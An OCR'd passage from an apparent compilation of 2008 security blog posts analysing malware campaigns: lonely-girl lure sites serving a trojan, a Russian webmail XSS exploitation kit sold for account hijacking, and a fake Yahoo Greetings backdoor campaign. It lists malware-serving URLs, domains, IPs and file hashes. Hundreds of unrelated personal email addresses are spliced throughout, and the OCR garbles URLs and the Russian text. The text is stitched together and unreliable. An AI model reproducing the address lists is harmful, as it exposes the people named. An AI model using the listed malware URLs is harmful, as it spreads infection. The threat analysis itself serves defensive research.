at high profile sites, ensuring that your customers or infrastructure cannot connect to these, 
will render current and upcoming massive IFRAME injected or embedded attacks pointless at 
least from the perspective of serving the rogue software. 


1. fit tp: //adanchev blogspot .con/2008/08/cybersquatting-security-vendors-for hall 
2. http: //ddanchev.blogspot .com/2007/12/diverse-portfolio-of-fake-security.htm 
3, http: //ddanchev blogspot .con/2008 /04/cybersquatting-symantecs-norton ht 

4, nttp:/ /adanchey. blogspot con/2007/10/rbns~fake-security-software hts 

5, http: //ddanchev blogspot .con/2008/02/localiizing- cybercrime cultural hal 

6 

7 

8 

9 


. http://ddanchev.blogspot.com/2007/11/lonely-polinas-secret.htm 


. http://ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese htm 


. http://ddanchev.blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese htm 
. http://ddanchev.blogspot.com/2008/03/localized-bankers-malware-campaign.htm 
10. http: //ddanchev. blogspot .com/2008/03/portfolio-of-fake-video-codecs.htm 
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4.4.11 Malware and Exploits Serving Girls (2008-04-15 13:34) 


Victory's HOME Page 


Here you cam see all my photes! 


Descriptive domains such as beautiful-and-lonely-girl dot com, amateur homepage looking 
sites, a modest photo archive of different girls, apparently amateur malware spreaders think 
that spamming these links to as many people as possible would entice them into visting the 
sites, thus infecting themselves with malware. 


It all started with [1]Lonely Polina, than came [2]lonely Ms. Polinka, and now we have 
Victoria. And despite that Polina and Polinka are both connected in terms of the malware 
served, and the natural RBN connection in face of HostFresh, as well as the site template used, 
Victoria is an exception. Some details on the recently soammed campaign : 


voena.net (199.237.229.158) is also responding to prettyblondywoman.com, where the 
exploit (WebViewFoldericon setSlice) and the malware (Trojan-Spy.Win32.Goldun) are served 
from voena.net/incoming.php and voena.net/get.php, both with a high detection rate 27/32 
(84.38 %). 


Individual homepages are dead, and this is perhaps where the social engineering aspect 
of the attack fails, all these girls for sure have their MySpace profiles up and running already, 
in between taking advantage of a popular photo sharing service. 

1. http: //ddanchev. blogspot .com/2007/11/lonely-polinas-secret .html 


1420 


xzibit23@mailcity.com 


gemballa7@hotmail.com 


middleofnowhere.ethicalhacker@gmail.com 


udo-geisler95@gmx.de 
evilboss-of-night@hotmail.com 
rudi9000@trash-mail.com 
matheusdeaamassa@gmail.com 
jackofblades666@hotmail.com 
bodrum2000@gmail.com 
warncke@comcast.net 
kamelrahmouni1946@gmail.com 
godclub2010@hotmail.com 
cheese@mymail.ch 
kanjjars@gmail.com 
a3515977@owlpic.com 
corneliusschmith1@live.no 
boyzcoz@gmail.com 

lunaticz _dol@hotmail.com 
exploit@gaza.net 

astral _demon90@hotmail.com 
saran 377@hotmail.com 
trunksneo@thematrixcore.net 
u.uncle@freenet.de 
galpan@freemail.gr 
swytch@she-geeks.com 
jizo79@gmail.com 

ramiro b@hotmail.com 

proxy 88@onet.eu 
k4nkr0@live.com 
foxOuf@live.fr 
cOlsndrs.test@gmail.com 
smaug1991@hotmail.com 
crazymom12@gmx.com 
z_x_i_i_@live.com 


nwayl6@gmail.com 


14173 


janki.dz@gmail.com 
usbkit@hotmail.com 
upadhye.ashok9@gmail.com 
4unwanted@gmail.com 
a41211@sapo.pt 
admin@vctools.net 
nirmaljose1309@gmail.com 
farquard@gmail.com 
developer.survey.junk@gmail.com 
nilesoft@hotmail.com 
jacques _arroyo@ftml.net 
prashant7889@hotmail.com 
9w2pju@gmail.com 
seander1l3@gmail.com 
junhiu@hotmail.com 
juasseh.n9@gmail.com 
vietms@gmail.com 

dha _213@hotmail.com 
blackploit@gmail.com 
kimivegasl@gmail.com 
jason666california@hotmail.com 
predatorda@gmail.com 

john _iago@hotmail.com 
jose.alves@gmail.com 
thutchinson85@gmail.com 
Idkhang123@gmail.com 
betahzc@gmail.com 
timrosaathi.raj@hotmail.com 
luisvieira@hotmail.co.uk 
el.kikheeee x@hotmail.com 
fatal-error@live.nl 
x0xh@hotmail.com 
nshih422@gmail.com 
linkinpark skate hareluya@hotmail.com 
rodrycol@hotmail.com 
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77928571@qq.com 
Szrzcz@vp.pl 

huopana _7@hotmail.com 
dynvivid@gmail.com 
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djfshady@hackerscorner.co.uk 
ztopperz@live.dk 
southamptononline@hotmail.com 
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sv1984@live.nl 

graf 999@hotmail.com 
piragathejan@gmail.com 
ht.server@gmail.com 
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hackersgateway@rock.com 
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2. http: //www.f-secure.com/weblog/archives/00001413.htm1 


4.4.12 Web Email Exploitation Kit in the Wild (2008-04-16 19:44) 


eee 


gmail.ru nextmail.ru zmail.ru pochta.ru 
e-mail.ru bigmail.org i.ua mail.ru 
rambler.ru km.ru tut.by mail.com 
mail.by post.su newmail.ru ukr.net 
Ornpasvtenb : BBeguTe agpec ornpaenrena [+ ] Peaupexturb Ha deiix 
http:/Aocalhost/whisper/index php 
Nonyyarenb : eee_nte agpec nonyvarenca 
Tema: esegute Temy coobujeHia [_ ] Bcrasnary saw Koq 


alert (i): a 
BEeenMTe TeKcT cooéwenxa 
Coobweunve : 


Send Mail Preview 


XSS exploitation within the most popular Russian, and definitely international in the long-term, 
web email service providers is also embracing the efficiency mindset as a process. This 
web based exploitation kit is great example of customization applied to publicly known XSS 
vulnerabilities within a segmented set of web sites, email providers in this case. 


The kit’s pitch automatically translated : 


" le script contains vulnerability to 15 - not the most popular Russian postal services 
(except 


buy), and one of the largest foreign mail servers that provide free mail - mail.com. Three of 
the vulnerabilities work only under Internet Explorer, all the rest - under Internet Explorer and 
Opera. 


The system also includes a 16 ready-to-use pages feykovyh authorization to enter the mail. 
Thus the use of the script is that you choose a template-XSS (code obhodyaschy security 
filters for your desired mail server) on which the attack would take place, complete field for 
a minimum of sending letters (sender, recipient, the subject, message) and choose Type of 
stuffing: 1) your own yavaskript code (convenient option to insert malicious code with iframe) 
2) code, driving the victim to a page feykovuyu authorization. In the first case, the victim is in 
the browser’s just a matter of your own scripte but in the second case, the victim is redirected 
to a page with false authorization, there enters its data, which logiruyutsya you, and sent 
back to his box. For the script is simple and free hosting with support for sendmail, php, but 
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herczeg.tamas.bence@gmail.com 
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djswift2@comcast.net 
giancal2@hotmail.com 
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altermeda2@hotmail.com 
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f.a.y.a.x.x.x@hotmail.com 
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myrapid.sell@gmail.com 
admin@burtay.org 

mr _nice@secure-mail.biz 
reitsurai@gmail.com 
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h4ckst3r@gmail.com 
michaelmaxup5@gmail.com 
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tonicooperil3@gmail.com 
nicodalke@gmail.com 
yakle1218@gmail.com 
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kanehacker@gmail.com 
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hiphop86@windowslive.com 
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nonetheless you should be aware that for more kachetvennoy work will not prevent you buy 
a beautiful domain. Also appearing inexpensive paid updated as closing loopholes in the mail 
filters. " 


[1]Automating the process of phishing by using the vulnerable sites as redirectors can 
outpace the success of the Rock Phish kit whose key success factor relies on diversity of the 
brands targeted whereas all the campaigns operate on the same IP. 


Moreover, as we’ve seen recently, highly popular and high-profile sites whose ever growing 
web applications infrastructure continues to grow, [2]still remain vulnerable to XSS 
vulnerabilities which were used in a successful [3]blackhat SEO poisoning campaign by 
injecting IFRAME redirectors to rogue security applications in between live exploit URLs. In 
fact, Ryan Singel is also pointing out on [4]such existing vulnerability at the CIA.gov, 
showcasing that spear phishing in times when phishers, soammers and malware authors are 
consolidating, can be just as [5]Jeffective for conducting cyber espionage, just as [6]gathering 
OSINT through botnets by [7]segmenting the infected population is. Why try to [8]malware 
infect the high-profile targets, when they could [9]Jalready be malware infected? 


Furthermore, [10]XSS vulnerabilities within banking sites are also nothing new, and as always 
the very latest XSS vulnerabilities will go on purposely unreported by the time phishers move 
onto new ones. How about the customer service aspect given that this XSS exploitation kit is 
yet another example of [11]a proprietary underground tool? If the XSS vulnerabilities aren’t 
working, custom zero day XSS vulnerabilities within the providers can be provided to the 
customer. Commercializing XSS vulnerabilities is one thing, embedding the exploits in a 
do-it-yourself type of tool another, but positioning the kit as a efficient way for running your 
"Request an Email Account to be Hacked" business is entirely another, which is the case with 
the kit. 


In 2008, is the infamous quote "Hack the Planet!" still relevant, or has it changed to "[12]XSS 
the Planet!" already, perhaps even "[13]Remotely File Include the Planet!"? 


1. http: //ddanchev. blogspot .com/2008/03/phishing-pages-for-every-bank-are.htm 


2. http: //ddanchev. blogspot .com/2008/03/massive-iframe-seo-poisoning-attack.htm 


3. http: //ddanchev. blogspot .com/2008/04/unicef-too-iframe-injected-and-seo.htm 


4, netp:/ blog. wired. con/27estroke6/2008/04/cia-copies-thre.htal 
5, http://www, businessweek. com/nagazine/content/08_16/64080032218430. ht 

6. http: //ddanchev. blogspot .com/2007/04/osint-through-botnets 

7. http: / /Adanchev. blogspot. con/2007/05/corporate- espionage- through botusts. hal 
8. http: / /ddanchev. blogspot .com/2007/10/eotnet~on-desand-service heal 

9. http: //ddanchev. blogspot . com/2008/03/loadsccs-ddos-for-hire-service. html 


10. http: //ddanchev. blogspot .com/2007/02/xss-vulnerabilities-in-e-banking-sites.htm 


11. http: //ddanchev.blogspot.com/2007/10/dynamics-of-malware-industry.htm 


12. http://ddanchev.blogspot .com/2007/05/xss-planet.htm 


13. http://ddanchev. blogspot .com/2007/07/sql-injection-through-search-engines.htm 
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4.4.13 Fake Yahoo Greetings Malware Campaign Circulating (2008-04-16 21:26) 


"YAHOO! GREETINGS = wy 


CAN GREETINGS 


The persistence of certain botnet masters cannot remain unnoticed even if you’re used to go- 
ing through over a dozen active malware campaigns per day, in this case it’s their persistence 
that makes them worth assessing and profiling. [1]The botnet which | assesed in February, 
the one that was crunching out phishing emails and using the infected hosts for hosting the 
pages, and parking the phishing domains, is still operational this time starting a fake Yahoo 
Greetings malware campaign by spamming the cybersquatted domains and enticing the user 
into updating their flash player with a copy of Backdoor.Agent.AJU. 


Upon visiting www4.yahoo.american-greeting.com.tag38.com/ecards/view.pd.htm it redi- 
rects to www3.yahoo.americangreetings.com.id759.com/ecards/view.pd.htm 

id759.com is currently responding to 24.161.232.218; 24.192.140.204; 68.36.236.67; 
76.230.108.105; 83.5.203.163; 85.109.42.164; 216.170.109.206 and also to set45.net; ser- 
vice28.biz; setup36.com and serves the Backdoor.Agent : 


www3.yahoo.americangreetings.com.id759.com/ecards/get new flashplayer .exe 


Scanners Result : 12/31 (38.71 %) 
Suspicious:W32/Malware!Gemini; W32/Agent.Q.gen!Eldorado 
File size: 44544 bytes 
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moreno.brook@yahoo.co.uk 
mitu8894@gmail.com 
cover.leecher@gmail.com 
delta1110pro@gmail.com 
elodia_superstar@hotmail.com 
bonbabs92@yahoo.com 
meenajayesh9@gmail.com 
mwkowal@gmail.com 
bots.lover@gmail.com 
webOnet@yahoo.com 
augiscl1@gmail.com 
h20712@yahoo.de 
microrista@live.com 
karma316@gmail.com 
overclockown@live.it 
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quangminhs@gmail.com 

mo _ghonem@hotmail.com 
ba-bor wa@hotmail.com 
thefish2010@gmail.com 
ajaygeorge007@gmail.com 
ssszone@gmail.com 

arham _ali60@yahoo.com 
maillvaibhav@gmail.com 
rex hendrix@hotmail.com 
lovesky6699@mail.goo.ne.jp 
bbabns@gmail.com 
phpyardim@gmail.com 
pe4h@hotmail.com 
eddiscinodon@yahoo.com 
jackdanielz@abv.bg 
authermichal@gmail.com 
onlyserial@gmail.com 
sivanisaha289@gmail.com 
thomas2010darrell@live.co.uk 
twizzlal@hotmail.com 
bobmorton@ymail.com 
d1107723@lhsdv.com 
rtz645@gmail.com 
rygopass@yahoo.com 
silthus-lol@yahoo.de 
funrepublic.masti@gmail.com 
joyuspatty@hotmail.com 
gregthomas1968@hotmail.com 
jrider85@yahoo.com 
starrspy@gmail.com 
kaps56@hotmail.com 
zhchyin@gmail.com 
sm@viteb.com 

steven _elvisda@yahoo.com 


jakash3@hotmail.com 
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clogdavis@gmail.com 
meerakanwar@yahoo.co.uk 
harbirsick9@yahoo.co.uk 
marechester@gmail.com 
asl-uk@hotmail.co.uk 
geryalb@hotmail.com 
nightawk@hotmail. it 
exe.soul@gmail.com 
joverrommel@gmail.com 
akukurt@gmail.com 
liuyinglovel3@gmail.com 
samsudrik@gmail.com 
dalewzor@gmail.com 
bydwpr2012@yahoo.com 
mchandak2007@yahoo.com 
josalijoe@yahoo.com 
m4n14x@gmail.com 
hackersuid@gmail.com 
reneewittner@hotmail.com 
lucifier 2000@yahoo.com 
fitnessreviewer@gmail.com 
virus.killroy@gmail.com 
cpf8921@hotmail.com 
pwg.var@gmail.com 
meridiancable2@gmail.com 
zffhfdg666@gmail.com 
correa@unieventos.com.br 
hex 4 geno@yahoo.com 
gkarabinas@gmail.com 
chethen2526@gmail.com 
bashkingy@gmail.com 
hackerdgreat99@gmail.com 
bkoerb@yahoo.co.uk 
nayla290110@gmail.com 
iqandjoke@yahoo.com.hk 
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MD5...: fe97eb8c0518005075fd638b33d5b165 
SHAI1..: d7a4258e37ce0dab0f7d770d1a9d979e921be07b 
SHA256: 138d31laelbbdec215d980c7b57be6e624c2f2e1cacd3934b7 7f50be8adabfb97 


"Backdoor.Agent.AJU is a malicious backdoor trojan that is capable to run and open ran- 
dom TCP port in a multiple instances attempting to connect to its predefined public SMTP 
servers. It then spams itself in email with a file attached in zip and password protected format. 
Furthermore, the password is included in the body of the email." 


tag38.com is responding to 211.142.23.21, and is a part of a scammy ecosystem of other 
phishing and malware related domains responding to the same IP. And these are the related 
subdomains impersonating Yahoo Greetings within : 


american-greeting.ca.xmI52.com 
www5.yahoo.american-greeting.ca.xmI52.com 
www9.yahoo.americangreeting.ca.www05.net 
yahoo.americangreetings.com.droeang.net 
yahoo.americangreetings.com.s8al.psmtp.com 
yahoo.americangreetings.com.s8a2.psmtp.com 
yahoo.americangreetings.com.s8b1.psmtp.com 
yahoo.americangreetings.com.s8b2.psmtp.com 
yahoo.americangreetings.droeang.net 
yahoo.americangreeting.ca.www05.net 
wwwé6.yahoo.american-greetings.com.www05.net 


What you see when in a hurry is not what you get when you got time to look at it twice. 
This and the previous campaign launched by the same party is a great example of risk and 
responsibility forwarding, in this case to the infected party, so what used to be a situation 
where an infected host was sending spamming and phishing emails only, is today’s malicious 
hosting infrastructure on demand. 


1. http: //ddanchev. blogspot .com/2008/02/inside-botnets-phishing-activities.htm 
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mryouloft@gmail.com 
robertcampbell9876@hotmail.com 
glynisgiacherio@hotmail.com 
dmz22@gawab.com 

thienthan nhobe855@yahoo.com 
vrootvn@gmail.com 

forsaken _raiders@yahoo.com 
ailidas666@gmail.com 
donipostal@gmail.com 
bethanyholdman@gmail.com 
dr.alpha@hotmail.co.uk 
nolanrayford@yahoo.co.uk 
rjtroy@ymail.com 
gertrudeleiner@hotmail.com 
th3 _w1tch@coconutstmik.com 
baham.m10@googlemail.com 
juohani@hotmail.com 
vietnamese23n@yahoo.com 
adi.s.gta@gmail.com 
zero.yt@gmail.com 
yury.chemerkin@gmail.com 
bruno _castegliani@yahoo.com.br 
1122@xakep.ru 
abbasz51@hotmail.com 
jellenarnaez@yahoo.com 
z4n3tl@yahoo.com 

poyo vi@yahoo.com 
dublililil111@gmail.com 
orr.shelia@yahoo.co.uk 
0x140b@gmail.com 
branden.ritter@yahoo.co.uk 
bleedinglifev2@hotmail.com 
pfunky92@yahoo.com 
tentyler@yahoo.com 


ami-ch@hotmail.fr 
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rubieporeda@hotmail.com 
njscorpion@gmail.com 
cathernlel1965@yahoo.co.uk 
gouravkakkar@gmail.com 

niki _mc@live.com 
cecillehenneman211@hotmail.com 
tuladay81@yahoo.co.uk 
astum.khan@gmail.com 
mOnt3r_@hotmail.com 
zizm@live.com 
joekamta@yahoo.co.uk 
muzamil-rauf@hotmail.com 
cmartin77@ymail.com 

achien _metal@yahoo.com 
bole.online@gmail.com 
panaramaa@hotmail.com 
muhammadlouis@sify.com 
jlay1984@live.com 
dennis.ostergaard@gmail.com 
cOding@stephack.com 
ufc.yager@live.com 
kingdomhearts111@web.de 
corinnemilano799@hotmail.com 
gladislandsman@hotmail.com 
melodieogle126@hotmail.com 
watertoeast@qq.com 
szfdrh88866@gmail.com 
alexmax021@yahoo.com 
1lgqaz@mailcatch.com 
yes.no64@gmail.com 

amado _randy@msn.com 

yo tadeo 14@hotmail.com 
r3d-d3v1l@hotmail.com 
zapped13@hotmail.com 


lee@lapelpinsuperstore.com 
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root@gmail.com 
code-monkey@gmx.com 
wimkoning@hotmail.com 
miers.seth@gmail.com 
voilentwave@gmail.com 
melhays7@yahoo.co.uk 
mercilessscorplo@gmail.com 
pathfinder sunny@yahoo.com 
seo@wholesalepins.com 
balky _riddler@hotmail.com 
broadfootinc@yahoo.com 
eugenebond11@yahoo.co.uk 
liandro-ar@hotmail.com 
axxc@hotmail.co.uk 
sirblacksoul@web.de 
trojan@0x70.com 
358963@googlemail.com 

el pali21@hotmail.com 
armin.ziaie@gmail.com 
dontkilldream@gmail.com 
ellile@petrattoys.com 
streetdance2010@hotmail.com 
raghav1l3jan@gmail.com 
harbirsick5@yahoo.co.uk 
dcongthanh@gmail.com 

zam _1745@yahoo.com.my 
forbidden92@hotmail.fr 
ben.russell15@yahoo.co.uk 
nicotok@hotmail.com 
nsa2969@gmail.com 

abo _ahmed2005@msn.com 
elinor82elin@yahoo.co.uk 
dj-coolguetta@live.fr 
roystraque@hotmail.fr 


macpinkbu@gmail.com 
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yann1309@hotmail.fr 
haliloo@live.nl 
zspyder@hotmail.com 
help@psicomputing.com 
bradkitelly@yahoo.co.uk 
d3I13t3m3@ymail.com 
jolantOl@gmail.com 
ilanstarprofil@aol.com 
svxllsvx@gmail.com 
ain.training@gmx.com 
nursetr2 _ryan@yahoo.com.ph 
ajaeashleyk@yahoo.co.uk 
dmpatel@cygnet-infotech.com 
justrappers@gmail.com 

roy _kl08@hotmail.com 
harbirsick12@yahoo.co.uk 
fieldsbeau@yahoo.co.uk 
danny.savage@live.co.uk 
corinecasarrubiasOO8@hotmail.com 
saifulfaizan@gmail.com 
xroot00@gmail.com 
okt@hotmail.com 
coldfirel1970@yahoo.com 
tracyk859@yahoo.com 
dima192@gmx.de 
eddyhack@msn.com 
msaeed.ma@gmail.com 
chudill23@yahoo.com 
campbell.adams@ymail.com 
consultoria@consultoriajau.com.br 
johndoeno001@gmail.com 
betazocker@mail.ru 
python3aka@gmail.com 
hslogs@gmail.com 
ghOst-dz@hotmail.com 
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blackvelocity@hotmail.com 
dictator@info.|It 
info@ibullets.com 
blaizer45@gmail.com 
amon77@geomix.at 
remote@hotmail.com.tr 
lesny321@gmail.com 
duckload592@gmail.com 
amandinh4zinha@hotmail.com 
chaiz64@gmail.com 
geostif@gmail.com 
x64-@live.com 
lulzcake@hotmail.com 
x.torreneter@gmail.com 
richard.g.ive.n.1@gmail.com 
rise.einstein@gmail.com 
one _lord9@yahoo.com 
kprof@hackforums.net 
webmasterlove@gmail.com 
elegido@elegido.co.cc 
isac.selea@live.se 
mz7@hotmail.es 
grattisnavi@live.se 
christinegbounds@yahoo.com 
hamue84@yahoo.de 
sadnesstk@web.de 
xpt2010@gmail.com 
tdiil15@yahoo.fr 
av.investments@gmail.com 
rodrigouzas@gmail.com 
vilius1101@gmail.com 
ahrimansefid6@yahoo.com 
darkkupid@hotmail.com 
stealerhunt@gmail.com 


mayaseven@hotmail.com 
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mkdhost.org@gmail.com 
guillaumard@orange.fr 
matthew00j@gmail.com 
masterx00@hotmail.co.nz 
ccgiooo@hotmail.com 
itisunnamed@live.fr 
giannos53@hotmail.co.uk 
black.panther30@yahoo.com 
scottecomusa@gmail.com 
dal3stev@gmail.com 
ro.buchinger@web.de 
sayur.ganja@gmail.com 
mukeshre _viking@yahoo.co.in 
natasha.ma941@gmail.com 
cindyscalese545@hotmail.com 
gazeteoyuncomprofil@hotmail.com 
silverbandit91@hotmail.com 
ibodeeeboard@live.com 
ahmed534@gmail.com 
lisannetruly123@hotmail.com 
brainwavemedi@gmail.com 
orion.computers@yahoo.com 
terrance.gould@live.com 
thelatinstudentr@hotmail.com 
suvrababu@yahoo.com 
logz889@gmail.com 
yer6hack@gmail.com 
schweidnitzer@web.de 
harbirsick13@yahoo.co.uk 
sukont@live.cl 
plombeur@yopmail.com 
thelst skyrunner@yahoo.com 
msn@receptaskiran.com 
akshay27041990@gmail.com 
237@koyunum.com 
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creative kingdom@hotmail.com 
gomezsugar70@yahoo.com 
mdrc111@gmail.com 
liangnv9@gmail.com 
nicolecooper0281@yahoo.co.uk 
goran-.-@live.com 
u6q@windowslive.com 
lOt.net@hotmail.com 
jasminekennemer112@hotmail.com 
shaukatali O8@yahoo.com 
cjakidd@gmail.com 
secanalystl0@gmail.com 
e.alin20@yahoo.co.uk 
fred.duke@live.com 
soniareguera@hotmail.com 
death.angel@hotmail.com 
blackhad@libero. it 
ibrahimabouhashish1997@live.com 
sumit _kalaria@yahoo.com 
tubbeboy@hotmail.com 
supermen22@live.fr 

Is support@mail.com 
hamid.csc@gmail.com 
infernl13@yahoo.com 
duoviux@gmail.com 
amphesafe@safe-mail.net 
winbignow@yahoo.com 
badcreditshelly@yahoo.com 
sonique@roboticworx.ru 
thomasw1981@gmail.com 
lindajones1529@gmail.com 
joaoventural2@hotmail.com 
bina usc@yahoo.co.in 
sitimaisarah916@yahoo.com 
dlocke1000@hotmail.com 
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cherriesf@yahoo.com 
rdhOxking@gmail.com 
bc641990@gmail.com 
r.b@rathienth.com 
gvm.vel@rediffmail.com 
r0073r@safe-mail.net 
datacorder@gmail.com 
edyculay@yahoo.com 
slyitallionstallion@gmail.com 
kutunhoian@yahoo.com.vn 
abogholo@gmail.com 
orpheus10@hotmail.com 
thijmenstavenuiter@gmail.com 
user42278@windowslive.com 
conv7uckincation@gmail.com 
zamani@futurenet.co.za 

chalo _green@hotmail.com 
ismapm@hotmail.com 
stevemartinl10050@yahoo.com 
paradiszamal@hotmail.fr 
deanlanl976@gmail.com 
sveiny5.web@live.fr 
shoishobtheone@yahoo.com 
wisdomniberg@yahoo.com 
prince _arb@live.com 
yesso32@hotmail.com 
d4rkhors3@zoho.com 
rilworm@msn.com 
chimbachan@yahoo.com 
pero.maximir@gmail.com 

Suraj _passion97@rediffmail.com 
broadway24@yahoo.com 
marksman@marksman78.co.cc 
cedricepsi@hotmail.com 
seplveda@gmail.com 
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kabinpeterson@yahoo.com 
mark399399@yahoo.com.sg 
szerener@gmail.com 
recyclebin921@hotmail.com 
rami623@yahoo.com 
alice.toniba@gmail.com 
inforgamer@gmail.com 
thejanitOr@yahoo.com 
remusika@gmail.com 
hang1728@hotmail.com 
mohed25@gmail.com 
dzx@yopmail.com 
notjack@strawberrycupcak.es 
fanatikk911@gmail.com 
ihateu3786@yahoo.com 
g3nksIl@hotmail.it 
alejandroivan21@hotmail.com 
yazid.dza@gmail.com 
unsatisfiedpoets@gmail.com 
vlad _cva@yahoo.com 
iamprone@hotmail.com 
firmand46@gmail.com 
arlindmorina@fortesa-city.com 
tsmonaghan@gmail.com 
anas.mayssouri@live.fr 
bintangkepagian@yahoo.com 
michaeljscarlisle@gmail.com 
elenavilinova@gmail.com 
joycehot@trumanpost.com 
mburnalll00@yahoo.com 
erikaant@orangeinbox.org 
prainaneake@stylebrand.com 
sethhuman@orangeinbox.org 
devsen2017@gmail.com 


yah.socks@googlemail.com 
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Ilvilnakki _abuser@yahoo.com 
mafia spanish@yahoo.com 
byrdvivid@goosebox.net 
porebe.ttyunkiya@gmail.com 
webmaster.login.access@gmail.com 
jobqesterL@mail.ru 
trdsjgf@mail.ru 

deep bhattl4@yahoo.com 
b.5522040.6@gmail.com 
lawsonhare@greeninbox.org 
gallegos.lucien@gmail.com 
shalmaikesga.r@gmail.com 
adamsgoose@trumanpost.com 
marjoriemint@greeninbox.org 
blackduck@goosebox.net 
3@futuramarketing.we.bs 
avbjeu.xipohjij@gmail.com 
snydersea@trumanpost.com 
qiji23@gmail.com 
beatricesnail@pinkinbox.org 
edithpelican@pinkinbox.org 
sharonpanther@trumanpost.com 
idamagpie@goosebox.net 
tdssuccess@gmail.com 
jo.esloss@gmail.com 
victor.battle07@gmail.com 
feliciamouse@blackinbox.org 
jansheep@trumanpost.com 
fernando1l5hurst@yahoo.co.uk 
ronaldmanila@greeninbox.org 
juliobell@greeninbox.org 
videofilmowanie@oo3.pl 
meetkooldude@gmail.com 
denemem21@gmail.com 


albertwuzzy@blackinbox.org 
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4.4.14 Phishing Emails Generating Botnet Scaling (2008-04-18 21:16) 
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A bigger and much more detailed picture is starting to emerge, with yet another spammed 
malware campaign courtesy of the botnet that is so far responsible for a [1]massive flood 
of fake Windows updates, phishing emails targeting the usual diverse set of brands, [2]fake 
yahoo greeting cards, and most recently delivering "executable news items", through Back- 
door.Agent.AJU malware infected hosts. 


Within the first five minutes, thirty three (33) phishing emails attempted to be delivered 
out of a sample infected host, all of them targeting NatWest or The National Westminster Bank 
Pic. Here are some samples, that of course never made it out to their recipient : 


- Sender Address: "NatWest Internet Banking '2008" to Recipient: 
<@fsl.ge.man.ac.uk>Subject: Natwest Bank Bankline: Confirm Your Login Email Content: 
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shalmaikesg.a.r@gmail.com 
peteshadow@greeninbox.org 
dereev77@gmail.com 
zibapoo@kashkolda.info 
keithape@greeninbox.org 
galpeleg22@gmail.com 
morz.e5000@gmail.com 
nerait@zhestkuy.info 
danielgreen@orangeinbox.org 
sfg@fshteghe.com 
sebbuy@live.fr 
paybk@yasoboh. info 
hayesdonkey@goosebox.net 
chegamfl@web.de 
altongray@trumanpost.com 
ericbell@blackinbox.org 
Spam@cutepurses.net 
vincentand@greeninbox.org 
taylorhot@greeninbox.org 
gloriagazelle@trumanpost.com 
virginiacrane@orangeinbox.org 
pura.steinmacher2498@gmail.com 
richy1001@gmail.com 
hearingimpmm@nextfash.com 
adegehrig27@gmail.com 
ben.pyle33@gmail.com 
sloan.fubievo.herman@gmail.com 
marionspider@blackinbox.org 
mr.ali.o3nz@gmail.com 
yah-kingz@live.co.uk 
harrietseal@pinkinbox.org 
bestpacmngames@gmail.com 
andygreen2010@yandex.ru 
alfreddelhi@goosebox.net 


mollycairo@goosebox.net 
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fanniebrown@blackinbox.org 
gilbertfern@pinkinbox.org 
jenniferlieske3@gmail.com 
diapeg@bijoveke.info 
dizinnmm@nextfash.com 
michelepiggy@pinkinbox.org 
ruthturkey@goosebox.net 
ceciliafly@orangeinbox.org 
kadidilass@mail.ru 
admin@brolobrolo.com 
gracelynmonserratblack@gmail.com 
ann _spy09@yahoo.com 
allisonprague@goosebox.net 
yvettegold@orangeinbox.org 
earlindigo@greeninbox.org 
zutimev@gmail.com 
eileenwalrus@pinkinbox.org 
catering865@tlen.pl 
florespigeon@trumanpost.com 
dijas78@yahoo.com 
cherylmagic@blackinbox.org 
CymnEmink@oxibusnesseve.com 
eileenmagpie@greeninbox.org 
shalmaikesgar@gmail.com 
chosen _199@yahoo.com 
jessejaipur@goosebox.net 
russellbrick@pinkinbox.org 
shawpizzazz@trumanpost.com 
linkowaniel4@mail.ru 
cliftonrome@trumanpost.com 
franklinllama@orangeinbox.org 
sarahardway90@gmail.com 
berrypacific@orangeinbox.org 
13@cheapseoservice.in 


morgandolphin@goosebox.net 
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annabartoval4@gmail.com 
sean.weissel8212@gmail.com 
hartmouse@trumanpost.com 
bellbogota@pinkinbox.org 
hutrok34@o2.pl 
susanfox@goosebox.net 
sunnyrwanson@yahoo.co.uk 
Punjabi gabru_munda2@yahoo.com 
m4dm4n.4.3v3r@gmail.com 
heidimonkey@orangeinbox.org 
bong.mcculloughO020@gmail.com 
anodatiethido@rambler.ru 
rogerkabul@blackinbox.org 
dianebadger@trumanpost.com 
Clourolix@bloggingranger.com 
irabrick@orangeinbox.org 
churv4c@yahoo.com 
albertojaipur@orangeinbox.org 
kadinmodasrs@nextfash.com 
abcllll@go2.pl 
barb.kueretl1300@gmail.com 
jonstrawberry@goosebox.net 
sotoorchid@blackinbox.org 
albertantique@blackinbox.org 
lovegalinavolkova@gmail.com 
nakchara__munda@yahoo.com 
luisworm@trumanpost.com 
fagell3@gmail.com 
adil72@yahoo.com 
lukesalmon@greeninbox.org 
scottandyou@gmail.com 
mvladyn@gmail.com 
harryegg@pinkinbox.org 
sreekupm@gmail.com 
szrk@list.ru 
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midhulbalan@yahoo.com 
graceeagle@greeninbox.org 
anca.muncaciu@gmail.com 
www1@ine.pl 
janrazzle@orangeinbox.org 
morze5000@gmail.com 
byrdwarsaw@goosebox.net 
irenelobster@greeninbox.org 
rosedragonfly@trumanpost.com 
seodenrv@web.de 
tanyaindigo@blackinbox.org 
jerrymoose@blackinbox.org 
morganwuzzy@greeninbox.org 
k.atona44@gmail.com 
tran.domenicl130@gmail.com 
cakuzem@gmail.com 
alexscarlet@goosebox.net 
Incessishi@farmaco.uni.cc 
kjs.adf.oi.e.wjo.jskwjewfh.sdkh@gmail.com 
fr_sm2001@att.net 
nikkapetrovich@gmail.com 
josetteeberling90@hotmail.com 
gerardhanoi@orangeinbox.org 
steveolive@greeninbox.org 
yolandacrane@orangeinbox.org 
torque046@yahoo.com 
arnolfeassnuk@gmail.com 
michaell1burger@gmail.com 
robertacamel@pinkinbox.org 
jacobsbadger@trumanpost.com 
larryl1brian@gmail.com 
cindyraw@greeninbox.org 
wardreindeer@greeninbox.org 
steveseastar@orangeinbox.org 
vasy hacker@yahoo.com 
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IntateZew@seoservers.info 
donnaambrose@loopar.osa.pl 
darwinhara@gmail.com 
travisj;am@trumanpost.com 
mariallsingleton@gmail.com 
tracybaghdad@trumanpost.com 
jeffery.noel@gmail.com 
vanesa.miller82@gmail.com 
bakydowo@o2.pl 
hanial201101@gmail.com 
a.z.a.ri.a.h.a.d.drik@gmail.com 


edgarmallard@greeninbox.org 


danny@online-discount-pharmacy1.com 


bookdozer@mail.ru 
IUZVZI@yinbox.net 
debbiemexico@goosebox.net 
elysellgalen@gmail.com 
burnssienna@trumanpost.com 
vhohote@medic-pills.org 
gaylordjetli@gmail.com 
kotolyub@gmail.com 
hamiltonwhite@pinkinbox.org 
